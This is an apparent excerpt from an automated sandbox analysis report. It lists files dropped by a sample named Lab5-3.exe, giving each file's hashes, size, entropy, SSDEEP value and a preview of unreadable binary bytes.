                                                                                                          MD5:4D1447A038E9EB32665CFA1563A614DA
                                                                                                          SHA1:8D24BFD10F7C26CF7F630F9268E3C792EB4D063A
                                                                                                          SHA-256:8ECA6FADCDFCC5C14DBE0AEA942F25DBF48C4D8C91303EBEA793B96AC6CF771A
                                                                                                          SHA-512:DF67F8F8D32674958FB6B38E970AE869C9343B7B35D829C505967C09A79AD3EFDA2CABFEACAF4E593E535FD55A81860D8F5871687D8126E61905B9BBAA664A22
                                                                                                          Malicious:false
                                                                                                          Preview:...Zx......%.B...\yI.!.L.x..,&.r.?=.+...c....p.t.'.......g.r1......%O.&.LW*u...nm......a=JE.d.......M}aH..&K.wV.iy..p.R__.z.6......dJqY.z8.....A.....7..{Ng.Z.....5@.0h.%.Q....z[.Rj..z.[F$#..S.....C..HeHOR..v...EHv1.)Z..K...B...Q.W.Q..6#.......>.....V]z8...L...^.....4v.J.Jw....."2V....U.x.%.w.F.3.A.W...$..v..rY...D......iF.f.jp........*@ Y.p..R./E..<.33...Q...nY..x..JP.Ko.z.`....t.D.....E...}.I..{.7.&H K...._&...N8...lo.....{.2.D...Y..H.;.C..i.x3...6..m....26...z&.A^m8)......B.Z....h0.#G...Z.1..~.....> W\..iD.`K.%".. c....2.lP.......d.{z.I....O;..l...\.^t.B.3G.$.|.w.I#.........S'rz.oc\........H&/{...'~.MV@.e....}-..D..Qf...D.f&.......>.M.;S1....%.....S.a...Ao...h.'4 ;...zA.n".8A..\s..j..'..!......S.w.L[M.."l.y...s..dPZ...l...WC..4B..e5;/G.....7.D...._.i4.}t:.F.}.8.;......K..^..].Le..EU78Q...x.c....4..../....J.....U;...3...2.m..-..b.E.9j.,....GY...F'c\...2.f........=,il...........O.|....!C5.."..Wi.kh.y... o..0G.}...[(=.....j.n..qL.U.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9264
                                                                                                          Entropy (8bit):7.979809215579027
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:FdHBrFzGYmduhbT4yHtIoy/cVPqrZ+SbH+q+8LILAb0Cb:/psIPNDyk5kxLILAbtb
                                                                                                          MD5:B540C9DA358EEE4CFE20CBCDBF61ADDC
                                                                                                          SHA1:AE1AD2D6597B078B92647DCFCFBD3824E26713F2
                                                                                                          SHA-256:7BC4F433EA51C8331E6FD4F50FD2FB2BF5A42DEB1DB021234A32143086D65801
                                                                                                          SHA-512:F09F772D75669945E03150CB5F0581EDE6ECE5C5A398B4163B9796C0532BC26C6CBB81090F3D85DB510F75804BB657464F02D5DFF750DA42682D6EBA9B073BEB
                                                                                                          Malicious:false
                                                                                                          Preview:.E.x..N..!..#..Ab.B..f........$XC...H....IBI...#...!(...l...M..........[%3q2|..4\.g...:8...%n.].....HI..7.@B.s.\..^.......d.yJ.....]......i..m..q0...Y.`..~-.....N....5..<.j...!...v.%..(.......k...e.,Q..S..I.... W.....>.-.w.v..{D.......c.}5'..a..hh..T?A.b.'..t..3........z......kJ.{.$m.C.......'_t...d..I..4.'Oy*D.O..4y..m..pI....u.Vk.D...}bL....[5.......q.wL.}........s6..L.......2^X...z;JLT$..t%.ms2..8.a..Z..G.5..a.d,jn...z1q<#.....H...5.s\....]o.|'...c.C..O....a.jf...OpU`..0..).-*.R..o.~a`..I.a........_....g...c.{.l.T...1P1.\..M\..P..PJ...r.N;.s{[.F.-F...^....t....HB=0......U..`u.v. .V.>2.'5u..)rQ.a.d..&x*.#e.v....(.(R...b..^....CGl..j..3..%.n.V....p6M2.X.;.iN...r.<.....H..P.`?.....(._.J..L#Qx......<.RY'.....=Rq.2S.1.*..J..Y.L...{nA..... ..R..O.....<?.(..._.(..'wJ..+.TT....ir.G.i.OX....d....C.x.......O.tj...W/..c...N.K2...1.x....s..q...Z.I.6T.K.(N...|......O..Q.!.+......knY......F....M...,n6.._...C...}@....A....OM......p....&.J~.9.../l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13824
                                                                                                          Entropy (8bit):7.985864025151218
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:Nw8Crj+OTAAt3/NhzFb1q4Aaw7PtYUxpHMVpOlyIke3RfUVntb:m8Cry8Bh7Eaw7vnkpOlpMVnZ
                                                                                                          MD5:5B1B1A47F06353556B727F9D964E6BF5
                                                                                                          SHA1:67184896B8A6970118413F443D2E699BA48C79EA
                                                                                                          SHA-256:81A631B5B747FF035F48EA3CAD3CCF8E14E7C962EE12109B0092D94807594127
                                                                                                          SHA-512:1EC5ED21B32052E53791C31957232DDA88A7D24451C12489094AAD61B2986E3FE293312FC37D0960CA8A9FC77E70907500128B07E6903BBFDFB56F6102136900
                                                                                                          Malicious:false
                                                                                                          Preview:'...?.....V....*....^.ih..X..~.....L..F.+k..w.O'....rX.n....*....].....'..Di...../E......~.=xM.S4...5e.X...K..........K..H..H'X.{.....f?.G.f.i.e1y.%f.bV:.....Z.I}.....g....3%.^..'.....?.G4......bq.QF.).r.Q.o].....=.[.<~.tw.J..q.)...v7..v.6.~..1KB.....w..*7QZl.>5?!..C....&......q..c....Ur...l...........{[...Q.<...Kx......W%..f.dN.s*.wI*.].?....{...A.GA....i<...Q3l%..0.....kuLs1;...DGW].......V@'...m..U..a9q...Xf4.<+......(.}.^.......o.>..~.L.h.X...x.#...>..$...1.u..J........xRW..:.4p?F.L....z......zv).$..tb\A...4.?........c.....n........[.G.....I..5],W.c....Q.....mM.o..'....?..4.X6<.n....2..l>....:..T.^..`....4....g{..x.T..........Y.|d....qu.QV.#.%...S.{.j.1......O.L......z!)/.s..`...J.HQ.%...i.u..UK......r..C.UY.g...m... .EN....P%/.F..e.gdX..G.p.O..8...-..P.t*.s..........P4:..`../|=.,T.EP.3.....t.V..N...N.._.Q.,.}..M{...c.Cdr?Dm._.`z......`)U...P............j..Y..K.w..u..k..A.g.S\..0..p......I:d.=.x....}..D..K..47..bI.a.w.~.=.o.^...p..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28112
                                                                                                          Entropy (8bit):7.992984882295486
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:mIywLaefowQU6gFoZTdzYklmYeLEfI6mO/tn/iz0vBt3yPTt6r5SUuGBDjPBLiJa:JngMvOSklmYzw6mO/5bix2YUrfPBL4kZ
                                                                                                          MD5:D4EFBD1BF1253085566D42BD81D82B6D
                                                                                                          SHA1:177AAE95F15359217A2119905A7DA813134F21A7
                                                                                                          SHA-256:3BBD7B68477EDD4FDBF2F36C65DA955B26AA61CF866F34D262DAC712654D1811
                                                                                                          SHA-512:219AF0EC74D7233F3728378E685F9CA56447CE4AEDC9AC13612428A88BBF56B58B49D7AA27146481456F12B78C30C7B6D7C3A4CB543A7615D9DDB5EF32E8E05A
                                                                                                          Malicious:false
                                                                                                          Preview:.8.M.KA..4.........t..{....Bu.T.~. A.4.....Y:.|.\)b..n..R.|.Y.....#....C.:..5#.......|:.=\..KH..D.......o.xB.x....dm....2uh.#...K.w".V.p...........;u8...X><..U.".C...?..Wf.6=..G..q.=yL..E..............#._~d.....VNO......n.^4.Mb...*.=.y....^.j.|.r.S...{wV....g...C..YQ..x.W.S.Jv...2..ig&.>.Q...n>5S..R.....D..j...9..tS.N...;..G.io...xc~....-2.[}.. .g.^....71.^..K.P.58..u.M.u...,S:..4.....C..v.Z..-..?A..k%.q...=.n.,..........F..i..^.6.)&..V..\........[$fWv........1Q.Y.lVP^T.b.'.;c.z .y...l.,..\z.w.1.....Y.G........i.y.....x..4.^Z.)(......[.U>.AGi...:.o..7.3.-.....!..T-.aQ.K.6......|=."`.>2......kx.!....2...N.|}...{-...0%QA.....#S.1....s............Q{...w.K.4..q.\Z.....M.....J.-......|'..J.......k..}R..8.n...]g..V.%.{:..+L.P..f../'*K.x.&.7...M..W.g.1. .p../...@...Qg.v4....R.0..G.B...-T.q..d..~.x...'."..@..y...I.a.UC%+.w!D./.S.,..L.d.2.}.:.....M!p!1s%...}..7.".!.........y....MT.\Qx.CSN.:....9e..._\.9.<1.....D.u....p......t..J>..@..T*.Y...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6048
                                                                                                          Entropy (8bit):7.96728967850736
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:UrifwJRk6Ew+lPp0Yw+wnz/NKeNMV6x4YtMbd9IB9jqjqRLU4z8QsdFkcsaGx0ut:Uri4JvT+l+Ywl1P+VKWzkj3VU4YQZcqZ
                                                                                                          MD5:0376F83A7A7AFEA9615ECF51949D2887
                                                                                                          SHA1:F662267703F4B00E0B9658F872A963B577F7892D
                                                                                                          SHA-256:7AC3BB4637DD35F7651BD3B9475A2D00335D03FD759D511B8E39D4A9B93BF399
                                                                                                          SHA-512:6AC2A5B606A57470A988A6EE8C85724D8AC026B19BF7694DFE9E3AAC04F5CB9F912CCC26AB6C072B4FE9532A2F6DEE85BC96D705106750224F0AF2362185F039
                                                                                                          Malicious:false
                                                                                                          Preview:..U..b.N..Q.........<p.,}.....o.`...-.1.......!.A5..;o..;?....mx.e ...7.k.>.`>F%..K^/.t.'...;...2./.X)P^8h....;`.CW"'..J....h.1.1..xG..'..R0...h..Id..v..s./w...#.<....p.N.`..'V....b..Zt..1yl.d`...PF.@q.hdO.I.\..<..v..4.6...'8&......E.v3..J...H.I.7....Pm+..3....f\...(4..%,X..Y0....Ng.k|..4...p.e1!$..}.#~j....^..j....G..?ZW...L...N...."TK..ojO.y...K..S/.j'..I.dB..5..\...EJ..c%).......sZZm...'U.6N.".5.>..`...M[v...s.y..>......M..#|.n.F#.$.....HU7......j...C....W..y..qH.............@w.{I.~..`..........;.@xjM2[....7.2)...).x.fp.....dg6....s...*.........x.L....O.....np.......J....+N...>>.=.....*..'*?aD.u^.*Y+Y|N.3...j..H..4..Z......Ga!.....h..6..D..]....HY5.j...$..[{.4L."z.#lJ.\.!.B....(...|/,...}uT...3.^-.RA@k..UiS...MR4..:........@.2..s]..~.\.... @.wUs....G.Z....].9O9..<4?.LN......$.....-.Q.j....m.C.aD.\.8..x...:..|.......i..dmf.....&.~Re0.M..*.E....O.0#L....(-.D...'.....\.......xD.....j~ ^.............4...v. i.8-.ow....m.v.u.S.U. >.W.Vdf.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11936
                                                                                                          Entropy (8bit):7.985255681000197
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:3b6sVo5HtrwvqgVVsMMnMX0P/GI0QPwpaSnSTuFZIpvWNJD+sEp9T+x9E/ulIor0:L6saltrwv1LEPYQop/SqFmYDup9TOO2U
                                                                                                          MD5:DC0C73D00E07AFD22CA8664742F6901B
                                                                                                          SHA1:5C434D96BE948F3FC8F9E009BD167642346F4E59
                                                                                                          SHA-256:DA740CE8072F48F348E9C6A942B242037AD49EB97FD9A4988A8C9341FBA67107
                                                                                                          SHA-512:308AF2B50E2C9F907E2CE46D72A486A7EBD0E8E4C5DE79872507FBB48B8691CB3A23DA6E474A054AAC2D318B7C2EBDB94B2F076A30F17938711D1B1156352EEF
                                                                                                          Malicious:false
                                                                                                          Preview:.....o. .......E.1...m.]..^L...Z ~<Sep.{.[k._~...j@y...T......k.. .X".y|..,-..L.K....NV..c^.C...f..O..#L=...E.K....F+.]... ...^.3.!.....).LD@..`Lg.....Z...h.8........'<...Q.J.J$>.s.@D....%..hB..<..jh...,(..>.K,4.U......z.....A..F-..$..I.8GA....eV.l...PA...4.h...2.z..[.BF..3.bl,.t.oY.{8$...L0..l.u...L..f~<..=!..o..FW!i....V\z.w.e..-....Y.+.2a.y$..e.T._`.@\*.8......x.:.w.'..T....9.......p.O...\.)eY_...V...J..5..A. .;...._..>DD]D..V..5...Z.7.^._....C.m[.@......p.453w..#...+.?..k...XI,l..B/1...rS..^..?..Yq...]4.....^)..o..Xw...I..Yhbzx....<v$zk...e"...h?>.W.b.!g.]S..'..8...R..\"$~S.....b....lA.,..1...].%.0.z..\...C2..9./.......n...A.:N...+X......c......[.O...6=uq...AK...T.....F...............n........R......... .y.5y....)...GT.Y...-R.n8Q.DZ...wdz.0.Zsx......L.=.r.^.w.#W._.S..,.0su5.z..a.].s.HX...2..a.w...h1MS.d?.a..3.$&.I#!.&R....@....e...j..z..wKR.E.x..'b'..qi...l....#O.W....!.Q..y....y.F\B......v........(.oO^.......A.....%....!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21408
                                                                                                          Entropy (8bit):7.991826730094116
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:RS4SRH6nEIDlQL03g0E6Sq19nODgGXXO/jKJQm71FSDxwPtb:RS4aH6zDKj0sgGnuKuyfSDxUZ
                                                                                                          MD5:A586DCDFA45CF9207707211C5200BAFA
                                                                                                          SHA1:0B05C981398967A6598811713FDF78FE767AF139
                                                                                                          SHA-256:F022D79F7EC4434B80C4CDEB6BE3156BBA72D98105D141CE891668666BA1E584
                                                                                                          SHA-512:44FECDD9595578210EEBC3B631D26CEFA7F5E2D9CE3BF438FCA24C3BECD551AFD462EA583574D7CE2517FBE12EFE2E85E93E81BDC367D45A283E7D8D01DCDB7C
                                                                                                          Malicious:false
                                                                                                          Preview:h'.....q.zn.4.k.3.3:%.^1.9..n...Rp0._DR.)....{6....m.g....X.HG.V.z..q.[..n.2?zT.s~.7.A...J*....9.".....;&.8...{...c.].....2.SD..P..%HQS...@4.$.ZD..S..*...7.s.6l".w.<..VJ.W.0.4y......5.,...bI.TrM..t..D.5.O..X..K.....K..bD...)./,.....r.0*/...f.E........V.u..GM.k.&9..m.'6j..C..:5..-....G.W..E@...X....b!%].Z../.L..... ^.s(7....Q..s$V..[../.._.+..;T.7......-........m....h...!rd.....`;.z.......)..|8.c.(..O..8.Vr1.......#\...x.?z..-.>v..={O.i.Xk..i...ct.eU....p.+b......l..H..u...bhcp|QG.g.kl..Z..@B..B,.4.^......v9...:.".......J ..p..]...=l..+...q.B....0?f+$`........\ye..7;..M....'b....[....8......:.V.....~w..}H#.A....h....Ea.z.b.(..m."3z......?..Ku.!..../...O..kIg.......j.( k..{...@)Q.Y.&.SK...-X..*M......G.)...T...}fi..5...XQ........@.FpI.b..R._..g..i..I.b...............Z?a..Ci.l.7s..9z<.......W.Y..3..Z.U.&..(...........k..3..f.2..~.i...}n.Wa.@.x7A.h./.S.....t1.'J....L.....yh..^#....)...%C.i..M.............>.T...ev.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.901918629124507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:2rAOjzUn8hdkonUzHfUTid3hBaUoSGFcmeykEdEElU92i:2BjznIGTGx0uKeY2ElUJ
                                                                                                          MD5:06EB05627D77E802D0C31F9B81E6C73F
                                                                                                          SHA1:B082FD5F1BBCADD906CE4666CFB0CCE3B3FA14A7
                                                                                                          SHA-256:E586318AEBB04F5BA842C82C0CD2B68B8C81D99693E50C65CC48DFB07EAE5365
                                                                                                          SHA-512:B20614A13145F3544EC1836D3F4D9C503B2EC4EA17CB0B4E8806696D3BC767475A71FAEC19BCBFC13556427FCA333C5AFC335C49549E63F8644457371462F3D1
                                                                                                          Malicious:false
                                                                                                          Preview:B...iY.>n..7}.....l._%E..........p..p./..x.S7....s,.O.NL.mU.;.n.*7...QL.v..*.z..['.4...PEl.v.{..a...5.....g......./.ziU..)..K..r..J..f.....T*../Y.J.T.-....,.>..3......D.).....p.l...NL>.>.F....&....@.y.y.......r.{..../#.d.9.[cY. .l....J5......eA..Wz..V..r.KV....'...`L~].ewYR.+2..@..i}.T}.Q.a.P.@#.....z..N..^..j....OUl>h}.......x ....e.?..i*...*.|p....);.)j9...F.i.OsL.l.j....%..F%9...h.G.YD.........Y"^..L.>0;<..}.C...1......7.....7.+.}LDa.w....:......E.;...L..4...tr.6B.......g..Q.I..0M.'...T...0......4y..x.G..... a..:.r.h...7...85J@..(M..m....(6. .i..../.^...%...Pp."..x..W._..nA..z...T.W....WF..X.{L;_...v.R.J[..S. #..VZ.....*M....W....4.........%vB..iZ.5M...+..p.Z..n..a.I..%.B_"..t..w.L.$.......MM(..;..WR.LG....J..E.......-.&3.O..7.8....r.W....MQc.b........z........# .C.<..L..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.944850026244417
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:GQ1X+snAkVU8cljRpIPvv5XlUp8Gx0uKeY2ElUJ:z+slaf9pIP540Cb
                                                                                                          MD5:2E9D5B8FC1E7F3E1A3A08A3A4B3147C5
                                                                                                          SHA1:566D2E9B05ECD2F3101E5332A7B0069DF7A26592
                                                                                                          SHA-256:55A5D4B08186999EE3D325901B88CFF5ADDB8A742903341479D3E55B1E21DD2D
                                                                                                          SHA-512:EF3C2E75920A9B242158E4D32645001950315499251C639FE452EFD469842CE6739FE03AE19D2A683238AC5871BDE4AA93F3D9ED40598472C8C4FE94515F1EC4
                                                                                                          Malicious:false
                                                                                                          Preview:.........3.ld-04....k...c\wI.hH&I^...A.;_...C&>.).....y..Xg.A...# D..DhfG.j..;.?...7i......P`....Xc...,u.Q..+.N..;._4/{{.0H....Xld.q..9i`..6....."z..z....I..8.$.y..N.I.0..b..B.zL.d...*TX..........Y}e.j.b.0....j;..RA.lm....D..~...58wnA.u.J;.[A...y/.J|.<....O..VQu.'J1%a.h7....*s9R.+....po..oX.lY....X....U..2O.z...YL.....A.....B..m...gD$'.g..H...I..ga.7b U+.2......|..].......S....7\...B..8.5.........a5.E.t..Q...bZ_.b..{o.....o....>G@h(.nr.zV.^.h:..c.)..rU..P.........I.V.n.NJ.\.........&/8..|2..NL..JHD..;..._r..4..k..mDF.g.k...p....{C.. }%..=.k.~p.d.y.?.x*...(..C....;...F.......:.....V../R.Z.H.,...Zn.:R...-.....kv5..P.L..;.,7..%....~n..[h..i6..w...A.....N8.O..b..mt...b....v..5c..yxy!.m.2t.N''k..W+[K$....)..3W..,.._.TO..,..~+...Z. ..n.M.X.4..W...!....-).$vI.GTY....E..r....EHY.$:.....,eI.s.$......d../..2......Ju...Q....v...m.6.X.....C.}.J#..js.9.d.@c.:6...*.\../7 .eX.....'U..S.o.:.._....`c.=.x.al.....]<mx2zo......TfO.wA..D.fk.$.......<n=/.....X.5.P..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5888
                                                                                                          Entropy (8bit):7.97149253453219
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:6qRwvXIiL9717NEeXFU1V8AUfgmlZd9PiSmVR1v05NhiGx0uKeY2ElUJ:6ZPZL9he2FU1V8AexzdA/RwhB0Cb
                                                                                                          MD5:66F84C60B2521E59B9BC83ECCC205D99
                                                                                                          SHA1:7D57EBB01D54186FA707B491939F938B0BD95D0A
                                                                                                          SHA-256:958EA18DB437DE6A30849E6A9873446DF445E74587E18609909396F8DEA9B604
                                                                                                          SHA-512:8A908FAEE3B4D0A65CDEC66D45917D66BDD92BAE79520093530CB7405C61F10EC2B016B272A0C59382EC0A34E95152C1B2E84DA5E439925C1CFD671F5290343D
                                                                                                          Malicious:false
                                                                                                          Preview:..~....q71.......+vz..*.....'...l...i.XGY=T.9.\.Rcy8....9'R*........c....Jb..Y-H-.{.KU[.Z.=d..wcv?.~0..&!.sSp@.H.......la..wj..V<.......=w.......-.......Bf..u...........f+....B...z..WOn..iz....z.`.ah.3...w<..Z.+.A...:....A.t...."...<.9......-...s.p/....+v6.=...|M...Iy........7.G..qP.<1.U...b.......CZ.5.......]2........m.qpe...L...<kEE...&8.-..+.)....rrz..H...7.;5.UB.h....K?...32.L.^.....Q.}..zQ.%.G....H..a..[.A..~U.|....5.w..Y.....E.g..p.Q......)......h.6....i......Y.c`W...Q......n....X../...$.:t}.Qw...OUI..dK.qe.m+(.f.>....dY.}.3...d.x....ja.=..!We."..2..4%Y@..!.MzNF...}B...I$$qg:.....|0.w.R.....H.5M..'X.[Q5.ba..d.CW.{F+pr.\:t.r...@gK..........%.0D.n..l..Y.X.p_.s..._.?.{.O}t......H.C.\.....6}..=..h....Ozj.y.N.G...2..0.#A@..p.6..b.....y...A+.a..f...^>ko.zU.LL2..._.(.....%c.<.rSp..[X..LC...8..]i*........aD./.G..P....f...W.t.2...i...^.5..@<..]*Xw.-....<.c..d..I._;X:U..;.5E.u.T...mY!..I.V..s.p.......E|.&eH*.... 4.J,...I....:5.."...$.2.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8512
                                                                                                          Entropy (8bit):7.977506037648177
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:tiJcGth6dXGtSZf8Ef132NlM9Hji992l1y40dLx0Cb:0mdXrn32Ni9HIK0txtb
                                                                                                          MD5:E0D1A00876BAB9DDD55F607023FF8507
                                                                                                          SHA1:8BA989D8FE84CD377E126F2BCC71265F22229DDA
                                                                                                          SHA-256:085247640B316D7E91F5BFF43C6E3A5BCF646DAFC569072CAA9DB51DC1E28597
                                                                                                          SHA-512:0421B66ED6418AB11753B194303A0FCD7118F673744D9AF34024C2518245A0E148BDFD3980784D8D2002A10E636493913E9EA3250BC0D73B3C52874C03640A3C
                                                                                                          Malicious:false
                                                                                                          Preview:.YYAy.y..'.a>b....'..v.^...F......#..h..A.h......E.....w..mZ.L.....*f2......P.S.{.ws@.....2.2..Dmc.....6.X=.Z..~..{e_..x..@.C.r....RU.Ap...e..S.l..y?u._.'.}.Tsv.S........H.c..s....~...u7.vq'....!....v@.._.m'uD...<.....],.l....@. .[.V5J.:.....#T.?..C....:..i.^...ap.p...yL.....Q...1$.......O.n.i;...V.s3.K.I?...7t>.....2<.:....vN`.U.$*..%,`.2*..0.Z../}.i._5.n...!=.Tv..f#.Anw_..l..Q`=p......o.......p..WL cY.K(...&s...^.......>..w.^L..........|.^q'......u...d...y?.k.m..;.F3...L.S...........{........f....p4b....i;...4..v..wPK}.5..^...[.t3y.l.A...J(.n......%#.U(2z%.u...hC....{..^.b...w...8L.|).....e...k...c.P.-w0.c....7R<m-P.....0...5}|Ne)+.ut..".u`$..q.2..QoN.c.aZ.}..M..^.<..\..S...b7q^..U....]....N8.W..d.7f.|....z.....W...N.L.WO....q.s..:.g......_.D.g..s...P..f....&c..6....%.T...}....4....p.d|Z.|...Ab..G..!4.+.....U.y..IN...N...X{e....uI..HMn..|<6.Q.&...y.G:*..=.B.x.....s......^..F..X.b....@C..VS(+}.X.k.....4...K0..1.._...Q..w./w...:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2864
                                                                                                          Entropy (8bit):7.931377415488599
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:+2wqR331daU2JGqf3dsdM7Toi7MiFuvHfUTid3hBaUoSGFcmeykEdEElU92i:LwW3FdKJHdUI3xA0Gx0uKeY2ElUJ
                                                                                                          MD5:29DF98BBF7A219C2A211C730EA014474
                                                                                                          SHA1:20F6ECAE6055C7DC80D2D851C0628ADCD9FACA49
                                                                                                          SHA-256:868BB57207EDA0B014B0275042B76B032E05CFA70B5D53E8F895E89A7DD99639
                                                                                                          SHA-512:BBBE8DC2F06D19C5F4002B2D694645B3A0D239CD4EB39B781BC87750C984F571DF8EDCA899449800C9B0966071938C5CC4DF54262E7853D78DCC388BD660F260
                                                                                                          Malicious:false
                                                                                                          Preview:u5..F.B..5....K.........^.1....D...D.e...p.0....z8.#mgO.d.\.?..:....Y.>..-"....@...<."......q..h..%.\~.._...L..e....\G.......S.....:.3.',..P....!..=....=F..>.B.F...L=.fI.=t..........:.|aGD.....hL./.c..a.G......d.[3T.:..!......}..Pc.|..@.H".....4....}...K[....j.3...~.x.#R.~....))N.lJE52r....Yz.W....t.b.U.....+.^..vO.F.u.JXIL.3....[V...S..N...oW.O.=.b..A.....w..-...r....E....s../..`.wv..&[.]P|'M..a...>Zn..D.?_.....,.j.T.Fib....`V!..?.R...D....1.y...b}c2V-.6P......;`....j.p..]..R....K.!.";....)ia`..z.kj.....'........4.....k.i...Qm........E.K....$u.q. .....|.P....<....8..Px......X.x+1.C.....3......>......X..Y..9..tI..8E..J..._.sE]....c[...3>.Ry..........P~lI..P....'f..DTL.a3.@....I.h...rI%$.n.3...L8.$..`..1..C..............I+..D.e.G.VH.I..G..f$...A.o.F.....k...-.1..h,m.....S....9...~......{...p.whx...)...P.S..C........|I.)...j.yBhr....P(h!..!.*...H.9...8X...]...(...G.,-![9...?..P.]i......X....e.t.6K..Q.y*..].2.?...}.y..7......u.y.E.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2432
                                                                                                          Entropy (8bit):7.931736075619546
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:UOC8DIBPFHc/wLatd91eQ8HfUTid3hBaUoSGFcmeykEdEElU92i:UsAPVywLaX91eQ7Gx0uKeY2ElUJ
                                                                                                          MD5:E3F8EAECDDBA79E3A256954D409A9EE1
                                                                                                          SHA1:026424F1308C0DE083CC5C0BC5B24E57258090F4
                                                                                                          SHA-256:107BA2BADFA850BF42062ADB759C377FDF9DDD9CE2CFAA8C18BF2D79D0B0D158
                                                                                                          SHA-512:D198D537D918D1148C1E72D36136C2FE570F1832AD138018068FBA94C952C4266D52C334F6B14787DC81EF1C509EDD7CCD6B9E393D78C949F6597D5EE76F1184
                                                                                                          Malicious:false
                                                                                                          Preview:1.C...6?..._).D.<.....b.-.*...gW...`}.|..=....f.v..S1.............>I.....-......Y..D......2\r.7...wU.dZ.#......!..c..tpb..@.|....[.{..Y.{.l.Y(h....Z..F.._z.....l.2...,2.8.U..\...(.V.E}!h...+...*..9...p...b.........7E.r....SG.yh...H/..~...C.?g.....".Z.o>u|.j..T..@....6c.~..M ..!?.$. ...bD..0d.b1...e.meY#y..i....a`V*.....;K.Z...T.Q4..C.....'..'..<.!<&....}..._.......;t.M.q....s.....].....5...b7.......{..:l.e.t...X.....\p.`.":.L(..z.&L...y.......\.....H.m./".5"...\0..qc.....%...1 .LC{....|.]......x......q....h?Z.........3e.!IX..n.|.............s........E8..r.t.r./[.K-yG..K......Nz........w^6.J&.u~V..2.zgm......6 e.Gi....v..1p...7...Tvc....;...N.(.1.&./X.$R......G*@=:\..f...?....yss.$.z.0.~.5.L.%@<..=*.d..t.?.y.J.....'<......Y.W^\y..$G..3.{..*....A.1....;K.5Dl....~..Cb]...2+.#.?q.. ....0.G%3W.......|:......}....e..7.|.w.A.O.*').v.{..'...3o<@.Y>.g...=.<E..&.....eN....`....9lS......-.....&...e......b....M.....?x.*l.....t|=o...e.)
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.925646746735454
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:U4PLzcCfSFe8PloY/mT1EhHfUTid3hBaUoSGFcmeykEdEElU92i:/PvzqFe8vfiGx0uKeY2ElUJ
                                                                                                          MD5:FD6228B374101EFD4C97568FD3DF273D
                                                                                                          SHA1:122B67AEBA50DF70AC87DD5269C95D4DA5479E79
                                                                                                          SHA-256:E2B3579FE8B32158FBD8E5AFFA10C88F9E65EF3B21CC7E838F8AA4507E1E49B2
                                                                                                          SHA-512:E5890CD982B7D4EF8DD90C93AFF70D865B307613624D45D868A88019744A37D450B37C99255A1E5D340CFB4C075A80B8DDB96376A86B42AE06ADB81849E68D7D
                                                                                                          Malicious:false
